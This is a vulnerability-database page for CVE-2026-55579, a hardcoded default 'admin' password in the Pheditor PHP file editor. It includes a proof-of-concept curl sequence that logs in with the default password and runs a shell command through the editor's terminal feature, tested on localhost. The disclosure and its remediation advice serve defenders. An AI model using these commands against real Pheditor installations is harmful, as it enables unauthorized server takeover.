Skip to main content

PHP CVE-2026-55579

CRITICAL
Use of Hard-coded Credentials (CWE-798)
2026-07-16 https://github.com/pheditor/pheditor GHSA-p4h7-p9rj-2pq2
9.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 16, 2026 - 20:34 vuln.today
Analysis Generated
Jul 16, 2026 - 20:34 vuln.today
CVE Published
Jul 16, 2026 - 20:11 github-advisory
CRITICAL 9.8

DescriptionGitHub Advisory

Summary

Pheditor ships with a hardcoded default password admin (SHA-512 hash stored at pheditor.php:11). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.

Details

Tested repository: https://github.com/pheditor/pheditor

Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)

Affected version: All versions of Pheditor

The password is hardcoded at pheditor.php:11:

php
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');

This is the SHA-512 hash of the string admin:

bash
echo -n 'admin' | sha512sum
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec

The application displays a warning banner at pheditor.php:1956-1958 when the default password is in use, but this is only visual - there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.

The password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.

Combined impact: With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.

PoC

Environment: Any system running Pheditor with default configuration.

Setup:

bash
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &

Positive trigger - authenticate with default password:

bash
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  -d "pheditor_password=admin" -L -o /dev/null -w "%{http_code}"

Expected: 200 - successful authentication with the default password admin.

Verify full access:

bash
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode 'command=echo `id`' \
  --data-urlencode "dir="

Expected: id output showing web server user - proves full system access through default credentials combined with terminal RCE.

Control (wrong password):

bash
curl -s -X POST http://localhost:8080/pheditor.php \
  -d "pheditor_password=wrongpassword" | grep -o 'not correct'

Expected: not correct - authentication logic works but default password is trivially guessable.

Cleanup:

bash
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt

Impact

Use of Hard-coded Credentials (CWE-798). The default password admin is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.

Attacker privileges: Unauthenticated remote attacker (PR:N).

Security boundary crossed: Unauthenticated → fully authenticated administrator.

Confidentiality impact: High - read all files within MAIN_DIR and beyond (via terminal).

Integrity impact: High - write/delete files, upload webshells, modify application code, execute arbitrary commands.

Availability impact: High - delete files and directories, disrupt services.

Suggested remediation:

  1. Remove the default password - require user to set a password during installation.
  2. Add a setup wizard that forces password creation on first access.
  3. Add a forced password change on first login with default credentials.
  4. Use password_hash() / password_verify() with PASSWORD_BCRYPT instead of raw SHA-512.

Credits

  • Thai Son Dinh from VinSOC Labs (R&D)

AnalysisAI

Hardcoded default administrator password in Pheditor (all versions prior to 2.0.6) lets remote unauthenticated attackers log in as admin using the string 'admin' — the SHA-512 hash of which is baked into pheditor.php line 11 — and then abuse the built-in terminal and file-upload features for immediate remote code execution. Any deployment left on defaults is trivially compromised because there is no forced password change, expiry, lockout, or setup wizard. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Recommended ActionAI

Within 24 hours, urgently identify all Pheditor installations and their versions (publicly available exploit code exists); confirm which systems are internet-facing or network-accessible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-55579 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy